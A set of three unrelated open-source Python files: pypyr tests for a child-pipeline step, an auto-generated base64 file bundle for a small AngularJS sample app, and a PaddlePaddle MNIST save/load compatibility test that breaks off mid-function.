def mocked_run_pipeline_with_runtime_error(*args, **kwargs):
"""Check pipeline name set on context in child pipeline with arb err."""
assert (kwargs['pipeline_name']
== kwargs['context'].pipeline_name == 'pipe name')
assert (kwargs['pipeline_name'] == 'pipe name')
raise RuntimeError('whoops')
def test_pype_use_parent_context_no_swallow(mock_pipe):
"""Input pype without swallowing error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = RuntimeError('whoops')
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with pytest.raises(RuntimeError) as err_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
assert str(err_info.value) == "whoops"
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True
}
}, None)
mock_logger_error.assert_called_once_with(
'Something went wrong pyping pipe name. RuntimeError: whoops')
def test_pype_use_parent_context_with_swallow(mock_pipe):
"""Input pype swallowing error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = RuntimeError('whoops')
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': False,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with(context, None)
mock_logger_error.assert_called_once_with(
'Something went wrong pyping pipe name. RuntimeError: whoops')
def mocked_run_pipeline_with_stop(*args, **kwargs):
"""Check pipeline name set on context in child pipeline with Stop."""
assert (kwargs['pipeline_name']
== kwargs['context'].pipeline_name == 'pipe name')
assert (kwargs['pipeline_name'] == 'pipe name')
raise Stop()
def test_pype_use_parent_context_swallow_stop_error(mock_pipe):
"""Input pype doesn't swallow stop error in child pipeline."""
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.side_effect = Stop()
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': False
}
})
with patch_logger('pypyr.steps.pype', logging.ERROR) as mock_logger_error:
with pytest.raises(Stop) as err_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
assert isinstance(err_info.value, Stop)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner.assert_called_once_with(context, None)
mock_logger_error.assert_not_called()
def test_pype_set_groups(mock_pipe):
"""Input pype with groups set."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader',
'groups': 'testgroup',
'success': 'successgroup',
'failure': 'failuregroup',
'pyDir': 'test dir'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=['testgroup'],
success_group='successgroup',
failure_group='failuregroup',
py_dir='test dir'
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
# endregion run_step
# region write_child_context_to_parent
def test_write_child_context_to_parent_wrong_type():
"""When out not a str, list or dict raise."""
with pytest.raises(ContextError) as err_info:
pype.write_child_context_to_parent(3, None, None)
assert str(err_info.value) == (
"pypyr.steps.pype pype.out should be a string, or a list or a dict. "
"Instead, it's a <class 'int'>")
def test_write_child_context_to_parent_string():
"""Single string writes single key to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f'})
pype.write_child_context_to_parent('c', parent, child)
assert parent == {'a': 'b',
'c': 'd'}
def test_write_child_context_to_parent_list():
"""Single string writes list of keys to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h'})
pype.write_child_context_to_parent(['c', 'g'], parent, child)
assert parent == {'a': 'b',
'c': 'd',
'g': 'h'}
def test_write_child_context_to_parent_dict():
"""Single string maps keys to parent."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h'})
pype.write_child_context_to_parent({'new-c': 'c',
'new-g': 'g'},
parent,
child)
assert parent == {'a': 'b',
'new-c': 'd',
'new-g': 'h'}
def test_write_child_context_to_parent_dict_with_formatting():
"""Single string maps keys to parent and formats child."""
parent = Context({'a': 'b'})
child = Context({'c': 'd',
'e': 'f',
'g': 'h and {e}'})
pype.write_child_context_to_parent({'new-c': 'c',
'new-g': 'g'},
parent,
child)
assert parent == {'a': 'b',
'new-c': 'd',
'new-g': 'h and f'}
# endregion write_child_context_to_parent
# cosmos/admin/samples/angularbasicdef.py (repo: kuasha/peregrine, license: MIT)
# Auto generated. Modification will be overwritten. #
# ------------------------------------------------- #
import base64
file_data_list=[
{
'name': '/__init__.py', 'data': base64.b64decode(b'X19hdXRob3JfXyA9ICdtYXJ1ZicK')
},
{
'name': '/app/index.html', 'data': base64.b64decode(b'PCFET0NUWVBFIGh0bWw+CjxodG1sIHhtbG5zOm5nPSJodHRwOi8vYW5ndWxhcmpzLm9yZyIgbGFuZz0iZW4iIG5nLWFwcD0iY29zbW9zVUlTaW1wbGVEZW1vIj4KPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+CiAgPHRpdGxlPk15IENvb2wgQXBwPC90aXRsZT4KICA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iTXkgY29vbCBjb3Ntb3MgYW5ndWxhciBqcyBhcHAiPgogIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+CiAgICA8IS0tW2lmIGx0ZSBJRSA4XT4KICAgICAgPHNjcmlwdD4KICAgICAgICBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCduZy1pbmNsdWRlJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmctcGx1cmFsaXplJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmctdmlldycpOwoKICAgICAgICAvLyBPcHRpb25hbGx5IHRoZXNlIGZvciBDU1MKICAgICAgICBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCduZzppbmNsdWRlJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmc6cGx1cmFsaXplJyk7CiAgICAgICAgZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbmc6dmlldycpOwogICAgICA8L3NjcmlwdD4KICAgIDwhW2VuZGlmXS0tPgo8L2hlYWQ+Cjxib2R5IHJvbGU9ImRvY3VtZW50Ij4KICAgIDwhLS1baWYgbHQgSUUgN10+CiAgICA8cCBjbGFzcz0iYnJvd3NlaGFwcHkiPllvdSBhcmUgdXNpbmcgYW4gPHN0cm9uZz5vdXRkYXRlZDwvc3Ryb25nPiBicm93c2VyLiBQbGVhc2UgPGEgaHJlZj0iaHR0cDovL2Jyb3dzZWhhcHB5LmNvbS8iPnVwZ3JhZGUgeW91ciBicm93c2VyPC9hPiB0byBpbXByb3ZlIHlvdXIgZXhwZXJpZW5jZS48L3A+CiAgICA8IVtlbmRpZl0tLT4KCiAgICA8ZGl2IG5nLXZpZXc+PC9kaXY+CgogICAgPHNjcmlwdCBzcmM9Ii8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMS4zL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Ii8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvYW5ndWxhcmpzLzEuMy4xNC9hbmd1bGFyLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0iLy9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvbGlicy9hbmd1bGFyanMvMS4zLjE0L2FuZ3VsYXItcm91dGUuanMiPjwvc2NyaXB0PgogICAgPCEtLSBMYXRlc3QgY29tcGlsZWQgYW5kIG1pbmlmaWVkIENTUyAtLT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvY3NzL2Jvb3RzdHJhcC5taW4uY3NzIiAvPgogICAgPCEtLSBPcHRpb25hbCB0aGVtZSAtLT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvY3NzL2Jvb3RzdHJhcC10aGVtZS5taW4uY3NzIiAvPgogICAgPCEtLSBMYXRlc3QgY29tcGlsZWQgYW5kIG1pbmlmaWVkIEphdmFTY3JpcHQgLS0+CiAgICA8c2NyaXB0IHNyYz0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9ib290c3RyYXAvMy4zLjUvanMvYm9vdHN0cmFwLm1pbi5qcyI+PC9zY3JpcHQ+CgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvYXBwLmNzcyIgLz4KCiAgICA8c2NyaXB0IHNyYz0ianMvYXBwLmpzIj48L3NjcmlwdD4KCiAgICA8c2NyaXB0IHNyYz0ianMvY29udHJvbGxlcnMvSG9tZUN0cmwuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9ImpzL2NvbnRyb2xsZXJzL0Fib3V0Q3RybC5qcyI+PC9zY3JpcHQ+CgoKPC9ib2R5Pgo8L2h0bWw+Cgo=')
},
{
'name': '/app/css/app.css', 'data': base64.b64decode(b'Ym9keSB7CiAgICBwYWRkaW5nLXRvcDogNjBweDsKfQ==')
},
{
'name': '/app/partials/home.html', 'data': base64.b64decode(b'ICAgIDxkaXYgY2xhc3M9Im5hdmJhciBuYXZiYXItaW52ZXJzZSBuYXZiYXItZml4ZWQtdG9wIiByb2xlPSJuYXZpZ2F0aW9uIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJuYXZiYXItaGVhZGVyIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJuYXZiYXItYnJhbmQiIGhyZWY9Ii8jL2hvbWUvIj5Db29sQXBwPC9hPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWNvbGxhcHNlIGNvbGxhcHNlIj4KICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibmF2IG5hdmJhci1uYXYiPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iYWN0aXZlIiBocmVmPSIvIy9ob21lLyI+SG9tZTwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvIy9hYm91dC8iPkFib3V0PC9hPjwvbGk+CiAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIHRoZW1lLXNob3djYXNlIiByb2xlPSJtYWluIj4KICAgICAgICA8aDE+e3toZWFkZXJ9fTwvaDE+CiAgICA8L2Rpdj4=')
},
{
'name': '/app/partials/about.html', 'data': base64.b64decode(b'ICAgIDxkaXYgY2xhc3M9Im5hdmJhciBuYXZiYXItaW52ZXJzZSBuYXZiYXItZml4ZWQtdG9wIiByb2xlPSJuYXZpZ2F0aW9uIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJuYXZiYXItaGVhZGVyIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJuYXZiYXItYnJhbmQiIGhyZWY9Ii8jL2hvbWUvIj5Db29sQXBwPC9hPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWNvbGxhcHNlIGNvbGxhcHNlIj4KICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibmF2IG5hdmJhci1uYXYiPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvIy9ob21lLyI+SG9tZTwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iYWN0aXZlIiBocmVmPSIvIy9hYm91dC8iPkFib3V0PC9hPjwvbGk+CiAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIHRoZW1lLXNob3djYXNlIiByb2xlPSJtYWluIj4KICAgICAgICA8aDE+e3toZWFkZXJ9fTwvaDE+CiAgICAgICAgPHA+VGhpcyBpcyBhIHNpbXBsZSBhbmd1bGFyIGpzIGFwcCBmb3IgdXNlIHdpdGggY29zbW9zIGZyYW1ld29yay48L3A+CiAgICA8L2Rpdj4=')
},
{
'name': '/app/js/app.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgondXNlIHN0cmljdCc7Cgp2YXIgY29zbW9zVUlTaW1wbGVEZW1vID0gYW5ndWxhci5tb2R1bGUoJ2Nvc21vc1VJU2ltcGxlRGVtbycsIFsKICAgICduZ1JvdXRlJwpdKS4KY29uZmlnKFsnJHJvdXRlUHJvdmlkZXInLCBmdW5jdGlvbigkcm91dGVQcm92aWRlcikgewogICAgJHJvdXRlUHJvdmlkZXIud2hlbignL2hvbWUnLCB7dGVtcGxhdGVVcmw6ICdwYXJ0aWFscy9ob21lLmh0bWwnLCBjb250cm9sbGVyOiAnSG9tZUN0cmwnfSk7CiAgICAkcm91dGVQcm92aWRlci53aGVuKCcvYWJvdXQnLCB7dGVtcGxhdGVVcmw6ICdwYXJ0aWFscy9hYm91dC5odG1sJywgY29udHJvbGxlcjogJ0Fib3V0Q3RybCd9KTsKCiAgICAkcm91dGVQcm92aWRlci5vdGhlcndpc2Uoe3JlZGlyZWN0VG86ICcvaG9tZSd9KTsKfV0pOw==')
},
{
'name': '/app/js/controllers/HomeCtrl.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgpjb3Ntb3NVSVNpbXBsZURlbW8uY29udHJvbGxlcignSG9tZUN0cmwnLCBbJyRzY29wZScsICckcm91dGVQYXJhbXMnLCBmdW5jdGlvbiAoJHNjb3BlLCAkcm91dGVQYXJhbXMpIHsKICAgICRzY29wZS5oZWFkZXIgPSAiSGVsbG8gd29ybGQiOwp9XSk7')
},
{
'name': '/app/js/controllers/AboutCtrl.js', 'data': base64.b64decode(b'LyoqCiAqIENyZWF0ZWQgYnkgTWFydWYgTWFuaXJ1enphbWFuIG9uIDcvMy8xNS4KICovCgpjb3Ntb3NVSVNpbXBsZURlbW8uY29udHJvbGxlcignQWJvdXRDdHJsJywgWyckc2NvcGUnLCAnJHJvdXRlUGFyYW1zJywgZnVuY3Rpb24gKCRzY29wZSwgJHJvdXRlUGFyYW1zKSB7CiAgICAkc2NvcGUuaGVhZGVyID0gIkFib3V0IjsKfV0pOw==')
}]
# framework_api/test_compatible_saveload.py (repo: zjjlivein/continuous_integration, license: Apache-2.0)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test compatible saveload."""
from __future__ import print_function
import numpy
import paddle
import paddle.fluid as fluid
import shutil
BATCH_SIZE = 64
PASS_NUM = 1
use_cuda = fluid.core.is_compiled_with_cuda()
predict = 'convolutional_neural_network'
def loss_net(hidden, label):
"""
loss net
:param hidden:
:param label:
:return:
"""
prediction = fluid.layers.fc(input=hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
avg_loss = fluid.layers.mean(loss)
acc = fluid.layers.accuracy(input=prediction, label=label)
return prediction, avg_loss, acc
def multilayer_perceptron(img, label):
"""
multilayer_perceptron
:param img:
:param label:
:return:
"""
img = fluid.layers.fc(input=img, size=200, act='tanh')
hidden = fluid.layers.fc(input=img, size=200, act='tanh')
return loss_net(hidden, label)
def softmax_regression(img, label):
"""
softmax
:param img:
:param label:
:return:
"""
return loss_net(img, label)
def convolutional_neural_network(img, label):
"""
cnn
:param img:
:param label:
:return:
"""
conv_pool_1 = fluid.nets.simple_img_conv_pool(
input=img,
filter_size=5,
num_filters=20,
pool_size=2,
pool_stride=2,
act="relu")
conv_pool_1 = fluid.layers.batch_norm(conv_pool_1)
conv_pool_2 = fluid.nets.simple_img_conv_pool(
input=conv_pool_1,
filter_size=5,
num_filters=50,
pool_size=2,
pool_stride=2,
act="relu")
return loss_net(conv_pool_2, label)
def train1(nn_type,
           use_cuda,
           save_dirname=None,
           model_filename=None,
           params_filename=None):
    """
    train
    :param nn_type:
    :param use_cuda:
    :param save_dirname:
    :param model_filename:
    :param params_filename:
    :return:
    """
    if use_cuda and not fluid.core.is_compiled_with_cuda():
        return
    startup_program = fluid.Program()
    main_program = fluid.Program()
    with fluid.program_guard(main_program, startup_program):
        with fluid.unique_name.guard():
            train_reader = paddle.batch(
                paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
            test_reader = paddle.batch(
                paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
            startup_program.random_seed = 90
            main_program.random_seed = 90
            img = fluid.data(
                name='img', shape=[None, 1, 28, 28], dtype='float32')
            label = fluid.data(name='label', shape=[None, 1], dtype='int64')
            if nn_type == 'softmax_regression':
                net_conf = softmax_regression
            elif nn_type == 'multilayer_perceptron':
                net_conf = multilayer_perceptron
            else:
                net_conf = convolutional_neural_network
            prediction, avg_loss, acc = net_conf(img, label)
            test_program = main_program.clone(for_test=True)
            test_program1 = main_program.clone(for_test=True)
            optimizer = fluid.optimizer.Adam(learning_rate=0.001)
            optimizer.minimize(avg_loss)

            def load(train_test_program, train_test_feed, train_test_reader):
                """
                test new load api
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_param"
                fluid.load(train_test_program, param_path, exe)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            def train_test(train_test_program, train_test_feed,
                           train_test_reader):
                """
                test
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_param"
                fluid.io.load_params(
                    executor=exe,
                    dirname=param_path,
                    main_program=train_test_program)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
            exe = fluid.Executor(place)
            feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
            exe.run(startup_program)
            epochs = [epoch_id for epoch_id in range(PASS_NUM)]
            lists = []
            step = 0
            for epoch_id in epochs:
                for step_id, data in enumerate(train_reader()):
                    metrics = exe.run(main_program,
                                      feed=feeder.feed(data),
                                      fetch_list=[avg_loss, acc])
                    if step % 100 == 0:
                        print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
                                                              metrics[0]))
                    step += 1
                if save_dirname is not None:
                    fluid.io.save_params(exe, "./compatible_save_param",
                                         main_program)
                    # load_param(test_program1)
                    # test for epoch
                    avg_loss_val, acc_val = train_test(
                        train_test_program=test_program,
                        train_test_reader=test_reader,
                        train_test_feed=feeder)
                    avg_loss_val1, acc_val1 = load(
                        train_test_program=test_program1,
                        train_test_reader=test_reader,
                        train_test_feed=feeder)
                    print("Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val, acc_val))
                    print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val1, acc_val1))
                    assert avg_loss_val == avg_loss_val1
                    assert acc_val == acc_val1
                    lists.append((epoch_id, avg_loss_val, acc_val))
                    shutil.rmtree("./compatible_save_param")
            # find the best pass
            best = sorted(lists, key=lambda item: float(item[1]))[0]
            print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
            print('The classification accuracy is %.2f%%' %
                  (float(best[2]) * 100))
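The `lists`/`best` bookkeeping at the end of each train function just picks the epoch with the lowest average test cost. Stripped of the Paddle machinery, the selection reduces to plain Python (the sample tuples here are made-up illustration data):

```python
# (epoch_id, avg_test_loss, test_acc) tuples, as collected once per epoch
lists = [(0, 0.31, 0.91), (1, 0.12, 0.97), (2, 0.19, 0.95)]

# Sorting by average loss (index 1) and taking the first entry is what the
# test file does; min() with the same key is equivalent without a full sort.
best = min(lists, key=lambda item: float(item[1]))
```

Here `best` is the epoch-1 tuple, since 0.12 is the smallest average loss.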
def train2(nn_type,
           use_cuda,
           save_dirname=None,
           model_filename=None,
           params_filename=None):
    """
    train
    :param nn_type:
    :param use_cuda:
    :param save_dirname:
    :param model_filename:
    :param params_filename:
    :return:
    """
    if use_cuda and not fluid.core.is_compiled_with_cuda():
        return
    startup_program = fluid.Program()
    main_program = fluid.Program()
    with fluid.program_guard(main_program, startup_program):
        with fluid.unique_name.guard():
            train_reader = paddle.batch(
                paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
            test_reader = paddle.batch(
                paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
            startup_program.random_seed = 90
            main_program.random_seed = 90
            img = fluid.data(
                name='img', shape=[None, 1, 28, 28], dtype='float32')
            label = fluid.data(name='label', shape=[None, 1], dtype='int64')
            if nn_type == 'softmax_regression':
                net_conf = softmax_regression
            elif nn_type == 'multilayer_perceptron':
                net_conf = multilayer_perceptron
            else:
                net_conf = convolutional_neural_network
            prediction, avg_loss, acc = net_conf(img, label)
            test_program = main_program.clone(for_test=True)
            test_program1 = main_program.clone(for_test=True)
            optimizer = fluid.optimizer.Adam(learning_rate=0.001)
            optimizer.minimize(avg_loss)

            def load(train_test_program, train_test_feed, train_test_reader):
                """
                test new load api
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_persist"
                fluid.load(train_test_program, param_path, exe)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            def train_test(train_test_program, train_test_feed,
                           train_test_reader):
                """
                test
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_persist"
                fluid.io.load_persistables(
                    executor=exe,
                    dirname=param_path,
                    main_program=train_test_program)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
            exe = fluid.Executor(place)
            feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
            exe.run(startup_program)
            epochs = [epoch_id for epoch_id in range(PASS_NUM)]
            lists = []
            step = 0
            for epoch_id in epochs:
                for step_id, data in enumerate(train_reader()):
                    metrics = exe.run(main_program,
                                      feed=feeder.feed(data),
                                      fetch_list=[avg_loss, acc])
                    if step % 100 == 0:
                        print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
                                                              metrics[0]))
                    step += 1
                if save_dirname is not None:
                    fluid.io.save_persistables(exe, "./compatible_save_persist",
                                               main_program)
                    # load_param(test_program1)
                    # test for epoch
                    avg_loss_val, acc_val = train_test(
                        train_test_program=test_program,
                        train_test_reader=test_reader,
                        train_test_feed=feeder)
                    avg_loss_val1, acc_val1 = load(
                        train_test_program=test_program1,
                        train_test_reader=test_reader,
                        train_test_feed=feeder)
                    print("Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val, acc_val))
                    print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val1, acc_val1))
                    assert avg_loss_val == avg_loss_val1
                    assert acc_val == acc_val1
                    lists.append((epoch_id, avg_loss_val, acc_val))
                    shutil.rmtree("./compatible_save_persist")
            # find the best pass
            best = sorted(lists, key=lambda item: float(item[1]))[0]
            print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
            print('The classification accuracy is %.2f%%' %
                  (float(best[2]) * 100))
def train3(nn_type,
           use_cuda,
           save_dirname=None,
           model_filename=None,
           params_filename=None):
    """
    train
    :param nn_type:
    :param use_cuda:
    :param save_dirname:
    :param model_filename:
    :param params_filename:
    :return:
    """
    if use_cuda and not fluid.core.is_compiled_with_cuda():
        return
    startup_program = fluid.Program()
    main_program = fluid.Program()
    with fluid.program_guard(main_program, startup_program):
        with fluid.unique_name.guard():
            train_reader = paddle.batch(
                paddle.dataset.mnist.train(), batch_size=BATCH_SIZE)
            test_reader = paddle.batch(
                paddle.dataset.mnist.test(), batch_size=BATCH_SIZE)
            startup_program.random_seed = 90
            main_program.random_seed = 90
            img = fluid.data(
                name='img', shape=[None, 1, 28, 28], dtype='float32')
            label = fluid.data(name='label', shape=[None, 1], dtype='int64')
            if nn_type == 'softmax_regression':
                net_conf = softmax_regression
            elif nn_type == 'multilayer_perceptron':
                net_conf = multilayer_perceptron
            else:
                net_conf = convolutional_neural_network
            prediction, avg_loss, acc = net_conf(img, label)
            test_program = main_program.clone(for_test=True)
            test_program1 = main_program.clone(for_test=True)
            optimizer = fluid.optimizer.Adam(learning_rate=0.001)
            optimizer.minimize(avg_loss)

            def load(train_test_program, train_test_feed, train_test_reader,
                     vars):
                """
                test new load api
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_vars"
                fluid.load(train_test_program, param_path, exe)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            def train_test(train_test_program, train_test_feed,
                           train_test_reader, vars):
                """
                test
                :param train_test_program:
                :param train_test_feed:
                :param train_test_reader:
                :return:
                """
                acc_set = []
                avg_loss_set = []
                param_path = "./compatible_save_vars"
                fluid.io.load_vars(
                    executor=exe,
                    dirname=param_path,
                    main_program=train_test_program,
                    vars=vars)
                for test_data in train_test_reader():
                    acc_np, avg_loss_np = exe.run(
                        program=train_test_program,
                        feed=train_test_feed.feed(test_data),
                        fetch_list=[acc, avg_loss])
                    acc_set.append(float(acc_np))
                    avg_loss_set.append(float(avg_loss_np))
                # get test acc and loss
                acc_val_mean = numpy.array(acc_set).mean()
                avg_loss_val_mean = numpy.array(avg_loss_set).mean()
                return avg_loss_val_mean, acc_val_mean

            place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
            exe = fluid.Executor(place)
            feeder = fluid.DataFeeder(feed_list=[img, label], place=place)
            exe.run(startup_program)
            epochs = [epoch_id for epoch_id in range(PASS_NUM)]
            lists = []
